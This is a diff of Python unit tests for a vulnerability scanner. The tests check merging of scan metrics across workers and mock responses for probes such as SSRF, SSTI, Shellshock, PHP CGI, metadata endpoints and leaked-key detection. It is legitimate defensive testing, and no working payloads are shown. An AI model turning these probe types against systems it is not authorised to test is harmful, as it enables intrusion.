1}, - "service_distribution": {"http": 2, "ssh": 1}, - "probe_breakdown": {"_service_info_http": "completed", "_web_test_xss": "completed"}, - "phase_durations": {"port_scan": 30.0, "fingerprint": 10.0, "service_probes": 15.0}, - "response_times": {"min": 0.01, "max": 0.5, "mean": 0.05, "median": 0.04, "stddev": 0.03, "p95": 0.2, "p99": 0.4, "count": 500}, - "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, - "total_duration": 60.0, - "rate_limiting_detected": False, "blocking_detected": False, - "open_port_details": [ - {"port": 22, "protocol": "ssh", "banner_confirmed": True}, - {"port": 80, "protocol": "http", "banner_confirmed": True}, - {"port": 443, "protocol": "http", "banner_confirmed": False}, - ], - "banner_confirmation": {"confirmed": 2, "guessed": 1}, - } - m2 = { - "connection_outcomes": {"connected": 20, "timeout": 10, "total": 30}, - "coverage": {"ports_in_range": 500, "ports_scanned": 400, "ports_skipped": 100, "coverage_pct": 80.0, "open_ports_count": 2}, - "finding_distribution": {"HIGH": 1, "LOW": 3}, - "service_distribution": {"http": 1, "mysql": 1}, - "probe_breakdown": {"_service_info_http": "completed", "_service_info_mysql": "completed", "_web_test_xss": "failed"}, - "phase_durations": {"port_scan": 45.0, "fingerprint": 8.0, "service_probes": 20.0}, - "response_times": {"min": 0.02, "max": 0.8, "mean": 0.08, "median": 0.06, "stddev": 0.05, "p95": 0.3, "p99": 0.7, "count": 400}, - "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 1, "probes_failed": 0, - "total_duration": 75.0, - "rate_limiting_detected": True, "blocking_detected": False, - "open_port_details": [ - {"port": 80, "protocol": "http", "banner_confirmed": True}, # duplicate port 80 - {"port": 3306, "protocol": "mysql", "banner_confirmed": True}, - ], - "banner_confirmation": {"confirmed": 2, "guessed": 0}, - } - merged = PentesterApi01Plugin._merge_worker_metrics([m1, m2]) - # Sums - self.assertEqual(merged["connection_outcomes"]["connected"], 50) - self.assertEqual(merged["connection_outcomes"]["timeout"], 15) - self.assertEqual(merged["connection_outcomes"]["total"], 65) - self.assertEqual(merged["coverage"]["ports_in_range"], 1000) - self.assertEqual(merged["coverage"]["ports_scanned"], 900) - self.assertEqual(merged["coverage"]["ports_skipped"], 100) - self.assertEqual(merged["coverage"]["coverage_pct"], 90.0) - self.assertEqual(merged["coverage"]["open_ports_count"], 5) - self.assertEqual(merged["finding_distribution"]["HIGH"], 3) - self.assertEqual(merged["finding_distribution"]["LOW"], 3) - self.assertEqual(merged["finding_distribution"]["MEDIUM"], 1) - self.assertEqual(merged["probes_attempted"], 6) - self.assertEqual(merged["probes_completed"], 5) - self.assertEqual(merged["probes_skipped"], 1) - # Service distribution summed - self.assertEqual(merged["service_distribution"]["http"], 3) - self.assertEqual(merged["service_distribution"]["ssh"], 1) - self.assertEqual(merged["service_distribution"]["mysql"], 1) - # Probe breakdown: union, worst status wins - self.assertEqual(merged["probe_breakdown"]["_service_info_http"], "completed") - self.assertEqual(merged["probe_breakdown"]["_service_info_mysql"], "completed") - self.assertEqual(merged["probe_breakdown"]["_web_test_xss"], "failed") # failed > completed - # Phase durations: max per phase (threads/nodes run in parallel) - self.assertEqual(merged["phase_durations"]["port_scan"], 45.0) - self.assertEqual(merged["phase_durations"]["fingerprint"], 10.0) - self.assertEqual(merged["phase_durations"]["service_probes"], 20.0) - # Response times: merged stats - rt = merged["response_times"] - self.assertEqual(rt["min"], 0.01) # global min - self.assertEqual(rt["max"], 0.8) # global max - self.assertEqual(rt["count"], 900) # total count - # Weighted mean: (0.05*500 + 0.08*400) / 900 ≈ 0.0633 - self.assertAlmostEqual(rt["mean"], 0.0633, places=3) - self.assertEqual(rt["p95"], 0.3) # max of per-thread p95 - self.assertEqual(rt["p99"], 0.7) # max of per-thread p99 - # Max duration - self.assertEqual(merged["total_duration"], 75.0) - # OR flags - self.assertTrue(merged["rate_limiting_detected"]) - self.assertFalse(merged["blocking_detected"]) - # Open port details: deduplicated by port, sorted - opd = merged["open_port_details"] - self.assertEqual(len(opd), 4) # 22, 80, 443, 3306 (80 deduplicated) - self.assertEqual(opd[0]["port"], 22) - self.assertEqual(opd[1]["port"], 80) - self.assertEqual(opd[2]["port"], 443) - self.assertEqual(opd[3]["port"], 3306) - # Banner confirmation: summed - self.assertEqual(merged["banner_confirmation"]["confirmed"], 4) - self.assertEqual(merged["banner_confirmation"]["guessed"], 1) - - - def test_close_job_merges_thread_metrics(self): - """16b: _close_job replaces generically-merged scan_metrics with properly summed metrics.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-A" - - # Two mock workers with different scan_metrics - worker1 = MagicMock() - worker1.get_status.return_value = { - "open_ports": [80], "service_info": {}, "scan_metrics": { - "connection_outcomes": {"connected": 10, "timeout": 2, "total": 12}, - "total_duration": 30.0, - "probes_attempted": 2, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 0, - "rate_limiting_detected": False, "blocking_detected": False, - } - } - worker2 = MagicMock() - worker2.get_status.return_value = { - "open_ports": [443], "service_info": {}, "scan_metrics": { - "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, - "total_duration": 45.0, - "probes_attempted": 2, "probes_completed": 1, "probes_skipped": 1, "probes_failed": 0, - "rate_limiting_detected": True, "blocking_detected": False, - } - } - plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} - - # _get_aggregated_report with merge_objects_deep would do last-writer-wins on leaf ints - # Simulate that by returning worker2's metrics (wrong — should be summed) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, - "scan_metrics": { - "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, - "total_duration": 45.0, - } - }) - # Use real static method for merge - plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics - - saved_reports = [] - def capture_add_json(data, show_logs=False): - saved_reports.append(data) - return "QmReport123" - plugin.r1fs.add_json.side_effect = capture_add_json - - job_specs = {"job_id": "job-1", "target": "10.0.0.1", "workers": {}} - plugin.chainstore_hget.return_value = job_specs - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) - plugin._redact_report = MagicMock(side_effect=lambda r: r) - - PentesterApi01Plugin._close_job(plugin, "job-1") - - # The report saved to R1FS should have properly merged metrics - self.assertEqual(len(saved_reports), 1) - sm = saved_reports[0].get("scan_metrics") - self.assertIsNotNone(sm) - # Connection outcomes should be summed, not last-writer-wins - self.assertEqual(sm["connection_outcomes"]["connected"], 18) - self.assertEqual(sm["connection_outcomes"]["timeout"], 7) - self.assertEqual(sm["connection_outcomes"]["total"], 25) - # Max duration - self.assertEqual(sm["total_duration"], 45.0) - # Probes summed - self.assertEqual(sm["probes_attempted"], 4) - self.assertEqual(sm["probes_completed"], 3) - # OR flags - self.assertTrue(sm["rate_limiting_detected"]) - - def test_finalize_pass_attaches_pass_metrics(self): - """16c: _maybe_finalize_pass merges node metrics into PassReport.scan_metrics.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-launcher" - plugin.cfg_llm_agent_api_enabled = False - plugin.cfg_attestation_min_seconds_between_submits = 3600 - - # Two workers, each with a report_cid - workers = { - "node-A": {"finished": True, "report_cid": "cid-report-A"}, - "node-B": {"finished": True, "report_cid": "cid-report-B"}, - } - job_specs = { - "job_id": "job-1", - "job_status": "RUNNING", - "target": "10.0.0.1", - "run_mode": "SINGLEPASS", - "launcher": "node-launcher", - "workers": workers, - "job_pass": 1, - "pass_reports": [], - "timeline": [{"event": "created", "ts": 1700000000.0}], - } - plugin.chainstore_hgetall.return_value = {"job-1": job_specs} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - plugin.time.return_value = 1700000120.0 - - # Node reports with different metrics - node_report_a = { - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "correlation_findings": [], "start_port": 1, "end_port": 32767, - "ports_scanned": 32767, - "scan_metrics": { - "connection_outcomes": {"connected": 5, "timeout": 1, "total": 6}, - "total_duration": 50.0, - "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, - "rate_limiting_detected": False, "blocking_detected": False, - } - } - node_report_b = { - "open_ports": [443], "service_info": {}, "web_tests_info": {}, - "correlation_findings": [], "start_port": 32768, "end_port": 65535, - "ports_scanned": 32768, - "scan_metrics": { - "connection_outcomes": {"connected": 3, "timeout": 4, "total": 7}, - "total_duration": 65.0, - "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 1, - "rate_limiting_detected": False, "blocking_detected": True, - } - } - - node_reports_by_addr = {"node-A": node_report_a, "node-B": node_report_b} - plugin._collect_node_reports = MagicMock(return_value=node_reports_by_addr) - # _get_aggregated_report would use merge_objects_deep (wrong for metrics) - # Return a dict with last-writer-wins metrics to simulate the bug - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, - "scan_metrics": node_report_b["scan_metrics"], # wrong — just node B's - }) - # Use real static method for merge - plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics - - # Capture what gets saved as pass report - saved_pass_reports = [] - def capture_add_json(data, show_logs=False): - saved_pass_reports.append(data) - return f"QmPassReport{len(saved_pass_reports)}" - plugin.r1fs.add_json.side_effect = capture_add_json - - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) - plugin._get_job_config = MagicMock(return_value={}) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._build_job_archive = MagicMock() - plugin._clear_live_progress = MagicMock() - plugin._emit_timeline_event = MagicMock() - plugin._get_timeline_date = MagicMock(return_value=1700000000.0) - plugin.Pd = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # Should have saved: aggregated_data (step 6) + pass_report (step 10) - self.assertGreaterEqual(len(saved_pass_reports), 2) - pass_report = saved_pass_reports[-1] # Last one is the PassReport - - sm = pass_report.get("scan_metrics") - self.assertIsNotNone(sm, "PassReport should have scan_metrics") - # Connection outcomes summed across nodes - self.assertEqual(sm["connection_outcomes"]["connected"], 8) - self.assertEqual(sm["connection_outcomes"]["timeout"], 5) - self.assertEqual(sm["connection_outcomes"]["total"], 13) - # Max duration - self.assertEqual(sm["total_duration"], 65.0) - # Probes summed - self.assertEqual(sm["probes_attempted"], 6) - self.assertEqual(sm["probes_completed"], 5) - self.assertEqual(sm["probes_failed"], 1) - # OR flags - self.assertFalse(sm["rate_limiting_detected"]) - self.assertTrue(sm["blocking_detected"]) - class TestPhase17aQuickWins(unittest.TestCase): """Phase 17a: Quick Win probe enhancements.""" @@ -4830,6 +2530,7 @@ def test_es_nodes_jvm_modern_no_finding(self): self.assertFalse(any("EOL JVM" in t for t in titles)) + class TestPhase17bMediumFeatures(unittest.TestCase): """Phase 17b: Medium feature probe enhancements.""" @@ -5099,6 +2800,7 @@ def test_smb_share_wiring_admin_shares_high(self): self.assertTrue(any("admin shares" in t.lower() for t in titles), f"titles={titles}") + class TestOWASPFullCoverage(unittest.TestCase): """Tests for OWASP Top 10 full coverage probes (A04, A08, A09, A10 + re-tags).""" @@ -5136,7 +2838,7 @@ def test_metadata_endpoints_tagged_a10(self): resp.status_code = 200 resp.text = "ami-id instance-id" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -5152,7 +2854,7 @@ def test_homepage_private_key_tagged_a08(self): resp.status_code = 200 resp.text = "-----BEGIN RSA PRIVATE KEY----- some key data" with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ -5168,7 +2870,7 @@ def test_homepage_api_key_still_a01(self): resp.status_code = 200 resp.text = "var API_KEY = 'abc123';" with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ -5194,7 +2896,7 @@ def fake_get(url, timeout=3, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -5218,7 +2920,7 @@ def fake_get(url, timeout=4, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_ssrf_basic("example.com", 80) @@ -5234,7 +2936,7 @@ def test_ssrf_basic_no_false_positive(self): resp.status_code = 200 resp.text = "Welcome" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_ssrf_basic("example.com", 80) @@ -5259,10 +2961,10 @@ def fake_post(url, data=None, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_post, ): result = worker._web_test_account_enumeration("example.com", 80) @@ -5281,10 +2983,10 @@ def fake_post(url, data=None, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_post, ): result = worker._web_test_account_enumeration("example.com", 80) @@ -5302,13 +3004,13 @@ def fake_request(url, *args, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_request, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_request, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin._time.sleep", + "extensions.business.cybersec.red_mesh.worker.web.hardening._time.sleep", ): result = worker._web_test_rate_limiting("example.com", 80) findings = result.get("findings", []) @@ -5340,13 +3042,13 @@ def fake_get(url, *args, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_get, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin._time.sleep", + "extensions.business.cybersec.red_mesh.worker.web.hardening._time.sleep", ): result = worker._web_test_rate_limiting("example.com", 80) self.assertEqual(len(result.get("findings", [])), 0) @@ -5369,7 +3071,7 @@ def fake_get(url, timeout=3, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get, ): result = worker._web_test_idor_indicators("example.com", 80) @@ -5385,7 +3087,7 @@ def test_idor_auth_required(self): resp.status_code = 401 resp.text = "Unauthorized" with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_idor_indicators("example.com", 80) @@ -5400,7 +3102,7 @@ def test_sri_missing_external_script(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5416,7 +3118,7 @@ def test_sri_present(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5429,7 +3131,7 @@ def test_sri_same_origin_ignored(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5442,7 +3144,7 @@ def test_mixed_content_script(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_mixed_content("example.com", 443) @@ -5458,7 +3160,7 @@ def test_mixed_content_https_only(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_mixed_content("example.com", 443) @@ -5477,7 +3179,7 @@ def test_js_lib_angularjs_eol(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_js_library_versions("example.com", 80) @@ -5493,7 +3195,7 @@ def test_js_lib_version_detected(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_js_library_versions("example.com", 80) @@ -5518,7 +3220,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5538,7 +3240,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5561,7 +3263,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5587,7 +3289,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -5604,7 +3306,7 @@ def test_debug_endpoint_404(self): resp.text = "" resp.headers = {} with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_common("example.com", 80) @@ -5654,7 +3356,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("example.com", 80) @@ -5683,7 +3385,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("example.com", 80) @@ -5692,6 +3394,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): self.assertEqual(len(plugin_findings), 0) + class TestDetectionGapFixes(unittest.TestCase): """Tests for detection gap fixes: Erlang SSH, BIND CVEs, DNS AXFR, SMTP HELP.""" @@ -5790,7 +3493,7 @@ def fake_recvfrom(size): return resp, ("1.2.3.4", 53) sock.recvfrom = fake_recvfrom return sock - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", side_effect=fake_socket_factory): with patch("socket.gethostbyaddr", side_effect=Exception("no reverse")): zones = worker._dns_discover_zones("1.2.3.4", 53) # vulhub.org should be in the list (discovered as authoritative or as fallback) @@ -5799,7 +3502,7 @@ def fake_recvfrom(size): def test_dns_zone_discovery_always_includes_fallbacks(self): """Zone discovery should include fallback domains even when reverse DNS works.""" _, worker = self._build_worker() - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recvfrom.side_effect = Exception("timeout") mock_sock.return_value = mock_inst @@ -5831,7 +3534,7 @@ def fake_recvfrom(size): answer += struct.pack('>H', len(version_txt) + 1) + bytes([len(version_txt)]) + version_txt return header + question_section + answer, ("1.2.3.4", 53) - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.sendto = fake_sendto mock_inst.recvfrom = fake_recvfrom @@ -5880,6 +3583,7 @@ def test_smtp_help_extracts_version(self): ) + class TestBatch2GapFixes(unittest.TestCase): """Tests for batch 2 gaps: MySQL CVE-2016-6662, PG MD5 creds, CouchDB, InfluxDB.""" @@ -5953,7 +3657,7 @@ def fake_recv(size): return md5_request return auth_response - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.database.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recv = fake_recv mock_sock.return_value = mock_inst @@ -5996,7 +3700,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get, ): result = worker._service_info_couchdb("1.2.3.4", 5984) @@ -6020,7 +3724,7 @@ def fake_get(url, **kwargs): resp.text = '{"status": "ok"}' return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_couchdb("1.2.3.4", 80) self.assertIsNone(result) @@ -6050,7 +3754,7 @@ def fake_get(url, **kwargs): resp.text = '{"memstats": {"Alloc": 12345}}' return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_influxdb("1.2.3.4", 8086) findings = result.get("findings", []) @@ -6070,7 +3774,7 @@ def fake_get(url, **kwargs): resp.headers = {} return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_influxdb("1.2.3.4", 80) self.assertIsNone(result) @@ -6089,6 +3793,7 @@ def test_influxdb_cve_2019_20933(self): self.assertFalse(any("CVE-2019-20933" in f.title for f in check_cves("influxdb", "1.7.6"))) + class TestBatch3GapFixes(unittest.TestCase): """Tests for batch 3 gaps: CMS CVEs, SSTI, Shellshock, PHP CGI, dedup bug.""" @@ -6211,7 +3916,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4200) @@ -6249,7 +3954,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4400) @@ -6293,8 +3998,8 @@ def fake_post(url, **kwargs): resp.text = '{"error":"..."}' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_cms_fingerprint("1.2.3.4", 6300) findings = result.get("findings", []) @@ -6323,7 +4028,7 @@ def fake_get(url, **kwargs): resp.text = 'Hello world' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4700) findings = result.get("findings", []) @@ -6350,7 +4055,7 @@ def fake_get(url, **kwargs): resp.text = 'Hello world' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4700) findings = result.get("findings", []) @@ -6375,7 +4080,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 6600) findings = result.get("findings", []) @@ -6394,7 +4099,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 80) findings = result.get("findings", []) @@ -6424,8 +4129,8 @@ def fake_post(url, **kwargs): resp.text = "PHP page" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_php_cgi("1.2.3.4", 6700) findings = result.get("findings", []) @@ -6454,8 +4159,8 @@ def fake_post(url, **kwargs): resp.text = "Normal" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_php_cgi("1.2.3.4", 6700) findings = result.get("findings", []) @@ -6492,7 +4197,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4200) @@ -6538,7 +4243,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4400) @@ -6562,7 +4267,7 @@ def fake_get(url, **kwargs): resp.text = '

    Order #5183 confirmed

    ' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4300) findings = result.get("findings", []) @@ -6587,7 +4292,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 6600) findings = result.get("findings", []) @@ -6600,7 +4305,7 @@ def test_http_alt_no_duplicate_cves(self): """_service_info_http_alt should NOT emit CVE findings (dedup fix).""" _, worker = self._build_worker(ports=[8080]) - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.common.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recv.return_value = ( b"HTTP/1.1 200 OK\r\n" @@ -6617,6 +4322,7 @@ def test_http_alt_no_duplicate_cves(self): self.assertEqual(result.get("server"), "Apache/2.4.25 (Debian)") + class 